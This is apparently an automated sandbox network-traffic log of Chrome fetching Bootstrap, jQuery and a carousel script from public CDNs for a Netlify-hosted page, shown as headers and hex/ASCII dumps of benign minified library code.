      2024-09-27 02:26:39 UTC1378INData Raw: 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 66 6f 72 28 74 3d 30 3b 74 3c 6c 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 50 65 72 52 6f 77 3b 74 2b 2b 29 7b 76 61 72 20 63 3d 69 2a 72 2b 28 65 2a 6c 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 50 65 72 52 6f 77 2b 74 29 3b 6e 2e 67 65 74 28 63 29 26 26 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6e 2e 67 65 74 28 63 29 29 7d 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 6f 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 29 7d 6c 2e 24 73 6c 69 64 65 72 2e 65 6d 70 74 79 28 29 2e 61 70 70 65 6e 64 28 6f 29 2c 6c 2e 24 73 6c 69 64 65 72 2e 63 68 69 6c 64 72 65 6e 28 29 2e 63 68 69 6c 64 72 65 6e 28 29 2e 63 68 69 6c 64 72 65 6e 28 29 2e 63 73 73 28 7b 77 69 64 74 68 3a 31 30 30 2f 6c 2e 6f 70 74 69 6f 6e 73 2e 73
      Data Ascii: ement("div");for(t=0;t<l.options.slidesPerRow;t++){var c=i*r+(e*l.options.slidesPerRow+t);n.get(c)&&a.appendChild(n.get(c))}d.appendChild(a)}o.appendChild(d)}l.$slider.empty().append(o),l.$slider.children().children().children().css({width:100/l.options.s
      2024-09-27 02:26:39 UTC1378INData Raw: 69 64 65 29 2c 72 2e 72 65 66 72 65 73 68 28 65 29 2c 6c 3d 73 29 2c 65 7c 7c 21 31 3d 3d 3d 6c 7c 7c 72 2e 24 73 6c 69 64 65 72 2e 74 72 69 67 67 65 72 28 22 62 72 65 61 6b 70 6f 69 6e 74 22 2c 5b 72 2c 6c 5d 29 7d 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 63 68 61 6e 67 65 53 6c 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6f 2c 73 2c 6e 2c 72 3d 74 68 69 73 2c 6c 3d 69 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 3b 73 77 69 74 63 68 28 6c 2e 69 73 28 22 61 22 29 26 26 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 6c 2e 69 73 28 22 6c 69 22 29 7c 7c 28 6c 3d 6c 2e 63 6c 6f 73 65 73 74 28 22 6c 69 22 29 29 2c 6e 3d 72 2e 73 6c 69 64 65 43 6f 75 6e 74 25 72 2e 6f 70 74 69 6f 6e 73 2e 73 6c 69 64 65 73 54 6f 53 63 72
      Data Ascii: ide),r.refresh(e),l=s),e||!1===l||r.$slider.trigger("breakpoint",[r,l])}},e.prototype.changeSlide=function(e,t){var o,s,n,r=this,l=i(e.currentTarget);switch(l.is("a")&&e.preventDefault(),l.is("li")||(l=l.closest("li")),n=r.slideCount%r.options.slidesToScr
      2024-09-27 02:26:39 UTC1378INData Raw: 65 2e 24 70 72 65 76 41 72 72 6f 77 26 26 65 2e 24 70 72 65 76 41 72 72 6f 77 2e 6f 66 66 28 22 63 6c 69 63 6b 2e 73 6c 69 63 6b 22 2c 65 2e 63 68 61 6e 67 65 53 6c 69 64 65 29 2c 65 2e 24 6e 65 78 74 41 72 72 6f 77 26 26 65 2e 24 6e 65 78 74 41 72 72 6f 77 2e 6f 66 66 28 22 63 6c 69 63 6b 2e 73 6c 69 63 6b 22 2c 65 2e 63 68 61 6e 67 65 53 6c 69 64 65 29 2c 21 30 3d 3d 3d 65 2e 6f 70 74 69 6f 6e 73 2e 61 63 63 65 73 73 69 62 69 6c 69 74 79 26 26 28 65 2e 24 70 72 65 76 41 72 72 6f 77 26 26 65 2e 24 70 72 65 76 41 72 72 6f 77 2e 6f 66 66 28 22 6b 65 79 64 6f 77 6e 2e 73 6c 69 63 6b 22 2c 65 2e 6b 65 79 48 61 6e 64 6c 65 72 29 2c 65 2e 24 6e 65 78 74 41 72 72 6f 77 26 26 65 2e 24 6e 65 78 74 41 72 72 6f 77 2e 6f 66 66 28 22 6b 65 79 64 6f 77 6e 2e 73 6c 69
      Data Ascii: e.$prevArrow&&e.$prevArrow.off("click.slick",e.changeSlide),e.$nextArrow&&e.$nextArrow.off("click.slick",e.changeSlide),!0===e.options.accessibility&&(e.$prevArrow&&e.$prevArrow.off("keydown.slick",e.keyHandler),e.$nextArrow&&e.$nextArrow.off("keydown.sli
      2024-09-27 02:26:39 UTC1378INData Raw: 69 64 65 72 2e 65 6d 70 74 79 28 29 2e 61 70 70 65 6e 64 28 69 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 69 63 6b 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 21 31 3d 3d 3d 74 68 69 73 2e 73 68 6f 75 6c 64 43 6c 69 63 6b 26 26 28 69 2e 73 74 6f 70 49 6d 6d 65 64 69 61 74 65 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 69 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 69 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 29 7d 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 73 74 72 6f 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 3b 74 2e 61 75 74 6f 50 6c 61 79 43 6c 65 61 72 28 29 2c 74 2e 74 6f 75 63 68 4f 62 6a 65 63 74 3d 7b 7d 2c 74 2e 63 6c 65 61 6e 55 70 45 76 65 6e 74 73 28 29 2c 69 28 22
      Data Ascii: ider.empty().append(i))},e.prototype.clickHandler=function(i){!1===this.shouldClick&&(i.stopImmediatePropagation(),i.stopPropagation(),i.preventDefault())},e.prototype.destroy=function(e){var t=this;t.autoPlayClear(),t.touchObject={},t.cleanUpEvents(),i("


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      7192.168.2.649713151.101.129.2294431672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:39 UTC636OUTGET /npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js HTTP/1.1
      Host: cdn.jsdelivr.net
      Connection: keep-alive
      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
      Origin: https://pengajuan-kartufisik.netlify.app
      sec-ch-ua-mobile: ?0
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      sec-ch-ua-platform: "Windows"
      Accept: */*
      Sec-Fetch-Site: cross-site
      Sec-Fetch-Mode: cors
      Sec-Fetch-Dest: script
      Referer: https://pengajuan-kartufisik.netlify.app/
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-27 02:26:39 UTC781INHTTP/1.1 200 OK
      Connection: close
      Content-Length: 79742
      Access-Control-Allow-Origin: *
      Access-Control-Expose-Headers: *
      Timing-Allow-Origin: *
      Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
      Cross-Origin-Resource-Policy: cross-origin
      X-Content-Type-Options: nosniff
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Content-Type: application/javascript; charset=utf-8
      X-JSD-Version: 5.2.0-beta1
      X-JSD-Version-Type: version
      ETag: W/"1377e-a0uYWpCr16scLjX/O4dNB8+EEO4"
      Accept-Ranges: bytes
      Age: 267213
      Date: Fri, 27 Sep 2024 02:26:39 GMT
      X-Served-By: cache-fra-eddf8230137-FRA, cache-ewr-kewr1740071-EWR
      X-Cache: HIT, HIT
      Vary: Accept-Encoding
      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
      2024-09-27 02:26:39 UTC16384INData Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 35 2e 32 2e 30 2d 62 65 74 61 31 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 32 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c
      Data Ascii: /*! * Bootstrap v5.2.0-beta1 (https://getbootstrap.com/) * Copyright 2011-2022 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */!function(t,
      2024-09-27 02:26:39 UTC16384INData Raw: 65 6c 2d 69 74 65 6d 22 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 7d 5f 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 29 7b 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 26 26 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 29 7d 5f 64 69 72 65 63 74 69 6f 6e 54 6f 4f 72 64 65 72 28 74 29 7b 72 65 74 75 72 6e 20 70 28 29 3f 74 3d 3d 3d 4a 3f 47 3a 55 3a 74 3d 3d 3d 4a 3f 55 3a 47 7d 5f 6f 72 64 65 72 54 6f 44 69 72 65 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 70 28 29 3f 74 3d 3d 3d 47 3f 4a 3a 5a 3a 74 3d 3d 3d 47 3f 5a 3a 4a 7d 73 74 61 74 69 63 20 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68
      Data Ascii: el-item",this._element)}_clearInterval(){this._interval&&(clearInterval(this._interval),this._interval=null)}_directionToOrder(t){return p()?t===J?G:U:t===J?U:G}_orderToDirection(t){return p()?t===G?J:Z:t===G?Z:J}static jQueryInterface(t){return this.each
      2024-09-27 02:26:39 UTC16384INData Raw: 6d 3d 65 2e 6f 70 74 69 6f 6e 73 2e 70 6c 61 63 65 6d 65 6e 74 2c 5f 3d 71 74 28 6d 29 2c 62 3d 6c 7c 7c 28 5f 21 3d 3d 6d 26 26 70 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 71 74 28 74 29 3d 3d 3d 62 74 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 65 3d 67 65 28 74 29 3b 72 65 74 75 72 6e 5b 5f 65 28 74 29 2c 65 2c 5f 65 28 65 29 5d 7d 28 6d 29 3a 5b 67 65 28 6d 29 5d 29 2c 76 3d 5b 6d 5d 2e 63 6f 6e 63 61 74 28 62 29 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 72 65 74 75 72 6e 20 74 2e 63 6f 6e 63 61 74 28 71 74 28 69 29 3d 3d 3d 62 74 3f 78 65 28 65 2c 7b 70 6c 61 63 65 6d 65 6e 74 3a 69 2c 62 6f 75 6e 64 61 72 79 3a 68 2c 72 6f 6f 74 42 6f 75 6e 64 61 72 79 3a 64 2c 70 61 64 64 69 6e 67 3a 63 2c 66 6c 69 70 56 61 72 69 61
      Data Ascii: m=e.options.placement,_=qt(m),b=l||(_!==m&&p?function(t){if(qt(t)===bt)return[];var e=ge(t);return[_e(t),e,_e(e)]}(m):[ge(m)]),v=[m].concat(b).reduce((function(t,i){return t.concat(qt(i)===bt?xe(e,{placement:i,boundary:h,rootBoundary:d,padding:c,flipVaria
      2024-09-27 02:26:39 UTC16384INData Raw: 65 6d 65 6e 74 29 2c 74 7d 5f 61 70 70 65 6e 64 28 29 7b 69 66 28 74 68 69 73 2e 5f 69 73 41 70 70 65 6e 64 65 64 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 74 3d 74 68 69 73 2e 5f 67 65 74 45 6c 65 6d 65 6e 74 28 29 3b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 72 6f 6f 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 28 74 29 2c 50 2e 6f 6e 28 74 2c 70 69 2c 28 28 29 3d 3e 7b 6d 28 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 63 6c 69 63 6b 43 61 6c 6c 62 61 63 6b 29 7d 29 29 2c 74 68 69 73 2e 5f 69 73 41 70 70 65 6e 64 65 64 3d 21 30 7d 5f 65 6d 75 6c 61 74 65 41 6e 69 6d 61 74 69 6f 6e 28 74 29 7b 5f 28 74 2c 74 68 69 73 2e 5f 67 65 74 45 6c 65 6d 65 6e 74 28 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 73 41 6e 69 6d 61 74 65 64 29 7d 7d 63 6f 6e 73 74 20 62 69
      Data Ascii: ement),t}_append(){if(this._isAppended)return;const t=this._getElement();this._config.rootElement.append(t),P.on(t,pi,(()=>{m(this._config.clickCallback)})),this._isAppended=!0}_emulateAnimation(t){_(t,this._getElement(),this._config.isAnimated)}}const bi
      2024-09-27 02:26:39 UTC14206INData Raw: 72 75 63 74 6f 72 2e 67 65 74 4f 72 43 72 65 61 74 65 49 6e 73 74 61 6e 63 65 28 74 2e 64 65 6c 65 67 61 74 65 54 61 72 67 65 74 2c 74 68 69 73 2e 5f 67 65 74 44 65 6c 65 67 61 74 65 43 6f 6e 66 69 67 28 29 29 7d 5f 69 73 41 6e 69 6d 61 74 65 64 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 61 6e 69 6d 61 74 69 6f 6e 7c 7c 74 68 69 73 2e 74 69 70 26 26 74 68 69 73 2e 74 69 70 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 55 69 29 7d 5f 69 73 53 68 6f 77 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 74 69 70 26 26 74 68 69 73 2e 74 69 70 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 47 69 29 7d 5f 63 72 65 61 74 65 50 6f 70 70 65 72 28 74 29 7b 63 6f 6e 73 74 20 65 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d
      Data Ascii: ructor.getOrCreateInstance(t.delegateTarget,this._getDelegateConfig())}_isAnimated(){return this._config.animation||this.tip&&this.tip.classList.contains(Ui)}_isShown(){return this.tip&&this.tip.classList.contains(Gi)}_createPopper(t){const e="function"==


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      8192.168.2.649726104.17.25.144431672C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-27 02:26:39 UTC572OUTGET /ajax/libs/jquery/3.5.1/jquery.min.js HTTP/1.1
      Host: cdnjs.cloudflare.com
      Connection: keep-alive
      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
      sec-ch-ua-mobile: ?0
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      sec-ch-ua-platform: "Windows"
      Accept: */*
      Sec-Fetch-Site: cross-site
      Sec-Fetch-Mode: no-cors
      Sec-Fetch-Dest: script
      Referer: https://pengajuan-kartufisik.netlify.app/
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-27 02:26:39 UTC929INHTTP/1.1 200 OK
      Date: Fri, 27 Sep 2024 02:26:39 GMT
      Content-Type: application/javascript; charset=utf-8
      Transfer-Encoding: chunked
      Connection: close
      Access-Control-Allow-Origin: *
      Cache-Control: public, max-age=30672000
      ETag: W/"5eb09ed3-15d84"
      Last-Modified: Mon, 04 May 2020 23:01:39 GMT
      cf-cdnjs-via: cfworker/kv
      Cross-Origin-Resource-Policy: cross-origin
      Timing-Allow-Origin: *
      X-Content-Type-Options: nosniff
      CF-Cache-Status: HIT
      Age: 589096
      Expires: Wed, 17 Sep 2025 02:26:39 GMT
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OIAjTkCboDkhvEnmlmt8xcc81y0ij02E3hfo9lZAaDVh4pQYxJw7is4CsSghu5ogKDCjwkddIFhY8auEd%2BzO1iboAtO5qlHygEjDR55hdyXZ2xk8vDm6qQuMGoTs0IAm%2FGBJ69x%2B"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
      Strict-Transport-Security: max-age=15780000
      Server: cloudflare
      CF-RAY: 8c980cd40d5c7cf9-EWR
      2024-09-27 02:26:39 UTC440INData Raw: 33 39 37 37 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 35 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a
      Data Ascii: 3977/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("j
      2024-09-27 02:26:39 UTC1369INData Raw: 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 66 6c 61 74 2e 63 61 6c 6c 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 65 29 7d 2c 75 3d 74 2e 70 75 73 68 2c 69 3d 74 2e 69 6e 64 65 78 4f 66 2c 6e 3d 7b 7d 2c 6f 3d 6e 2e 74 6f 53 74 72 69 6e 67 2c 76 3d 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 61 3d 76 2e 74 6f 53 74 72 69 6e 67 2c 6c 3d 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 79 3d 7b 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 65 2e 6e 6f 64 65 54 79 70 65 7d 2c 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20
      Data Ascii: on(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return
      2024-09-27 02:26:39 UTC1369INData Raw: 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 74 2b 31 29 25 32 7d 29 29 7d 2c 6f 64 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 25 32 7d 29 29 7d 2c 65 71 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 6e 3d 2b 65 2b 28 65 3c 30 3f 74 3a 30 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 30 3c 3d 6e 26 26 6e 3c 74 3f 5b 74 68 69 73 5b 6e 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73
      Data Ascii: s.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(0<=n&&n<t?[this[n]]:[])},end:function(){return this
      2024-09-27 02:26:39 UTC1369INData Raw: 6e 3d 74 7c 7c 5b 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 28 70 28 4f 62 6a 65 63 74 28 65 29 29 3f 53 2e 6d 65 72 67 65 28 6e 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 75 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 69 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 74 2e 6c 65 6e 67 74 68 2c 72 3d 30 2c 69 3d 65 2e 6c 65 6e 67 74 68 3b 72 3c 6e 3b 72 2b 2b 29 65 5b 69 2b 2b 5d 3d 74 5b 72 5d 3b 72 65 74 75 72 6e 20 65 2e 6c 65 6e 67 74 68 3d 69 2c 65 7d 2c 67 72 65 70 3a 66 75 6e 63 74 69 6f
      Data Ascii: n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:functio
      2024-09-27 02:26:39 UTC1369INData Raw: 7c 28 22 2b 49 2b 22 29 29 7c 29 22 2b 4d 2b 22 2a 5c 5c 5d 22 2c 46 3d 22 3a 28 22 2b 49 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 57 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 42 3d 6e 65 77 20 52 65 67 45 78 70 28 4d 2b 22 2b 22 2c 22 67 22 29 2c 24 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 2b 22 2b 7c 28 28 3f 3a 5e 7c 5b 5e 5c 5c 5c 5c 5d 29 28 3f 3a 5c 5c 5c 5c 2e 29 2a 29 22 2b 4d 2b 22 2b 24 22 2c 22 67 22 29 2c 5f 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 2b 22 2a 2c 22 2b 4d 2b 22 2a 22 29 2c 7a 3d 6e
      Data Ascii: |("+I+"))|)"+M+"*\\]",F=":("+I+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+W+")*)|.*)\\)|)",B=new RegExp(M+"+","g"),$=new RegExp("^"+M+"+|((?:^|[^\\\\])(?:\\\\.)*)"+M+"+$","g"),_=new RegExp("^"+M+"*,"+M+"*"),z=n
      2024-09-27 02:26:39 UTC1369INData Raw: 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 22 66 69 65 6c 64 73 65 74 22 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 7b 64 69 72 3a 22 70 61 72 65 6e 74 4e 6f 64 65 22 2c 6e 65 78 74 3a 22 6c 65 67 65 6e 64 22 7d 29 3b 74 72 79 7b 48 2e 61 70 70 6c 79 28 74 3d 4f 2e 63 61 6c 6c 28 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 74 5b 70 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 5d 2e 6e 6f 64 65 54 79 70 65 7d 63 61 74 63 68 28 65 29 7b 48 3d 7b 61 70 70 6c 79 3a 74 2e 6c 65 6e 67 74 68 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 4c 2e 61 70 70 6c 79 28 65 2c 4f 2e 63 61 6c 6c 28 74 29 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 65 2e
      Data Ascii: 0===e.disabled&&"fieldset"===e.nodeName.toLowerCase()},{dir:"parentNode",next:"legend"});try{H.apply(t=O.call(p.childNodes),p.childNodes),t[p.childNodes.length].nodeType}catch(e){H={apply:t.length?function(e,t){L.apply(e,O.call(t))}:function(e,t){var n=e.
      2024-09-27 02:26:39 UTC1369INData Raw: 68 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 65 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 53 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 76 61 72 20 74 3d 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 29 2c 74 3d 6e 75 6c 6c 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 65 28 65 2c 74 29 7b 76 61 72 20 6e 3d 65 2e 73 70 6c 69 74 28 22 7c 22 29 2c 72 3d 6e 2e 6c 65 6e 67 74 68
      Data Ascii: h&&delete e[r.shift()],e[t+" "]=n}}function le(e){return e[S]=!0,e}function ce(e){var t=C.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function fe(e,t){var n=e.split("|"),r=n.length
      2024-09-27 02:26:39 UTC1369INData Raw: 45 6c 65 6d 65 6e 74 26 26 28 61 3d 28 43 3d 72 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 45 3d 21 69 28 43 29 2c 70 21 3d 43 26 26 28 6e 3d 43 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 6e 2e 74 6f 70 21 3d 3d 6e 26 26 28 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 6c 6f 61 64 22 2c 6f 65 2c 21 31 29 3a 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 6f 65 29 29 2c 64 2e 73 63 6f 70 65 3d 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64
